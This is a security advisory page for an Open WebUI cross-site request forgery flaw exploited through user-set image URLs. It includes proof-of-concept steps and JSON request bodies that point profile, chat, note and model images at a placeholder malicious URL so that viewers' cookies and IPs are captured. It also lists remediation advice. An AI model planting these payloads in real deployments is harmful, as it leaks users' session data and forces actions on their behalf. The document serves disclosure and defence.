Open WebUI CVE-2026-45317
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.
This can be exploited in various locations, including:
• Profile picture
• Model picture
• Hidden images in shared chats
• Images within shared notes
Details
Vulnerable Code:
This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:
Profile Image in chat
• Note: rendering profile picture in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code
Profile Picture edit
• Note: Profile picture rendering in edit
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205
Profile Image Navbar
• Note: Profile picture rendering in navbar
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237
Profile Image UserList
• Note: rendering images in user list admin panel
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399
Images in chat
• Note: rendering images in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35
Image in chat
• Note: Image sent in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 Model image in chat
• Note: Model image rendering in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128
Model image in chat response
• Note: Model image rendering in the assistant response
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612
Model Image Admin settings
• Note: Model image rendering in the admin settings
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336
Model Image Workspace
• Note: Model image rendering in the workspace
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336
Model Image Edit
• Note: Model image rendering in the edit modal
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407
Image in Notes
• Note: Image rendering in shared note
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184
Root Cause
- Insecure display of image
• Application is sending a GET request to the unvalidated image url
- Lack of Input Validation
• Image url is not validated for filetype
PoCs
PoC (profile picture)
Environment
• Open-WebUl latest version (v0.6.41)
• Valid user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, user-agent, etc
Step 2: Profile Image URL
- Add user
- Change the profile image url parameter to the malicious URL (server was used for PoC)
- Example POST request:
<img width="1245" height="484" alt="image" src="https://github.com/user-attachments/assets/295f0ab0-fe41-4d50-9c38-cb8c51a3bca2" />
- Repeat action
- Repeat for userSignUp, updateUserProfile, and update
Step 3: View Image on Victim Admin Account
- Log into an admin account
- Visit the admin panel (/admin/users/overview)
- Notice the GET request sent to the malicious URL
Step 4: Verify User Information Is Sent
- Confirm user information is sent
<img width="1280" height="677" alt="image" src="https://github.com/user-attachments/assets/cb2f4039-167f-43f4-bd37-ffaf4d476cee" />
PoC (chat)
Environment
• Open-WebUl latest version (v0.6.41)
• Valid user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Start chat
- Start chat
- Send a message
- Resend POST request
- Resend post request to this endpoint /api/v1/chats/[chat_id_here]
- Add in a file with type set to image and the url set to the malicious link
- Replace models/ids/malicious_url_here with what is applicable
- {"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}}
<img width="646" height="593" alt="image" src="https://github.com/user-attachments/assets/1273fe2b-3b3b-45dc-9c52-6811f7b18667" />
- Share chat
- Copy link to share the chat
Step 3: View Image on Victim Account
- Log into a valid account
- Open the shared chat
- Notice the GET request sent to the malicious URL from the hidden image on the page
<img width="1384" height="500" alt="image" src="https://github.com/user-attachments/assets/bd6e220d-e039-4916-9865-5ce9f0939951" />
Step 4: Verify User Information Is Sent
- Confirm user information is sent
<img width="1480" height="797" alt="image" src="https://github.com/user-attachments/assets/78374c2e-d9c6-476b-944d-1c8230398989" />
PoC (notes)
Environment
• Open WebUI latest version (v0.6.41)
• Valid user with access to notes
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Create Note
- Resend POST request to /api/v1/notes/[note_id_here]/update
- Add in the malicious URL to a file
- Example parameters
- (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):
{"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}
<img width="892" height="662" alt="image" src="https://github.com/user-attachments/assets/325a9bfa-2fb3-45be-aeec-e5695085d7d0" />
- Refresh page and notice the request being sent to the malicious URL
- Share note and copy link
Step 5: View Note on Valid Account
- Log into a valid account
- Open the shared note
- Notice the GET request sent to the malicious URL from the hidden image on the page
<img width="1597" height="317" alt="image" src="https://github.com/user-attachments/assets/767d865b-04a0-42b9-82fc-122acb9cbf16" />
Step 6: Verify User Information Is Sent
- Verify that user information is sent.
<img width="1997" height="860" alt="image" src="https://github.com/user-attachments/assets/b0ecab88-9830-4fb4-ac18-acda9eb44ff7" />
PoC (model)
Environment
• Open WebUI latest version (v0.6.41)
• Admin user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Create Model
- Navigate to /workspace/models
- Create or edit a model
- Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]
- Change the profile_image_url to the malicious link
- Example parameters:
{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}
<img width="887" height="618" alt="image" src="https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd" />
Step 3: View Image on Valid Account
- Log into a valid account
- Create chat with the model
- Notice a GET request is sent to the malicious url
- All users starting a chat with that model will be vulnerable to the attack
<img width="1852" height="468" alt="image" src="https://github.com/user-attachments/assets/ff69c0a2-326d-4b99-9d8c-a73d9aa0deff" />
Step 4: View Image on Admin Account
- Navigate to /workspace/models
- Notice GET request sent to malicious url
<img width="1793" height="482" alt="image" src="https://github.com/user-attachments/assets/bda6e687-ccad-4914-a779-281dc67ffcfe" />
Step 5: Verify User Information Is Sent
- On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.
<img width="1687" height="910" alt="image" src="https://github.com/user-attachments/assets/c783ad50-6701-4df8-8beb-ba0957baa2d9" />
Other Attack Examples
- Alternative malicious links
- Signout of Open WebUI
- /api/v1/auths/signout
- Internal network endpoints
- Signout of other applications
- Resource intensive endpoints
- Etc
Recommended Fix
- Store images
- Instead of sending a GET request to load the image each time, store the image and render on the page
- Validate input
- Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)
Impact
Vulnerability Type
- CWE-352: Cross-Site Request Forgery (CSRF)
- CWE-20: Improper Input Validation
Affected users
- All authenticated users
The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.
AnalysisAI
Cross-Site Request Forgery via image URL manipulation in Open WebUI allows authenticated users to perform unauthorized actions on behalf of victims by embedding malicious image URLs in profile pictures, model images, shared chats, and notes. When any user (including admins) views these compromised images, their browser sends GET requests to attacker-controlled servers, enabling cookie theft, denial of service, or execution of sensitive operations. Publicly available proof-of-concept code demonstrates exploitation across multiple attack vectors. The vulnerability affects all versions up to and including v0.9.2, with a vendor-released patch available in v0.9.3.
Technical ContextAI
Open WebUI renders user-supplied image URLs directly in HTML img src attributes across multiple Svelte components (ProfileImage.svelte, Image.svelte, ResponseMessage.svelte, ModelEditor.svelte, and others) without URL validation or content-type enforcement. When a browser loads these images, it automatically sends HTTP GET requests to the specified URL, including all associated cookies and request context. The vulnerability stems from two root causes: (1) insecure direct display of unvalidated image URLs, treating any URL string as legitimate image content, and (2) lack of input validation on file types, allowing any URL scheme rather than restricting to image content (CWE-20: Improper Input Validation). The application fails to implement CSRF tokens, SameSite cookie policies, or image URL whitelisting. Affected components are found throughout the codebase in ProfileImage.svelte, Account.svelte, Navbar.svelte, UserList.svelte, Image.svelte, Message.svelte, Placeholder.svelte, ResponseMessage.svelte, Models.svelte, ModelEditor.svelte, image.ts, and UserMessage.svelte (CPE: pkg:pip/open-webui).
RemediationAI
Upgrade to Open WebUI v0.9.3 or later immediately; this is the vendor-released patch that addresses the CSRF vulnerability. For organizations unable to upgrade immediately, implement the following compensating controls: (1) Disable or restrict image upload/rendering functionality by removing the ability for users to set custom image URLs in profile settings, model configurations, and shared content-this prevents injection of malicious URLs but significantly degrades user experience. (2) Implement SameSite=Strict cookie policy on all authentication cookies to prevent cross-site request forgery at the browser level, though this provides only partial protection for logged-in users visiting attacker-controlled pages. (3) Add Content Security Policy (CSP) headers with img-src 'self' to restrict image loads to same-origin only, blocking external image requests-this is a strong control but may break functionality requiring external image hosting. (4) Validate and whitelist image file types server-side (accept only .jpg, .png, .gif, .jpeg, .webp extensions) and reject URLs pointing to API endpoints or non-image domains-implement this in image upload/update API endpoints. (5) Implement CSRF tokens (anti-CSRF double-submit tokens) on all state-changing operations to prevent unauthorized requests, though this does not stop information disclosure via GET requests to external URLs. (6) Sanitize or wrap user-supplied image URLs through a server-side image proxy that fetches and validates content before serving to clients, preventing direct browser requests to attacker URLs. Testing after any patch or control implementation is essential to ensure image rendering functionality remains intact.
Same weakness CWE-20 – Improper Input Validation
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-j6w6-986j-2m2m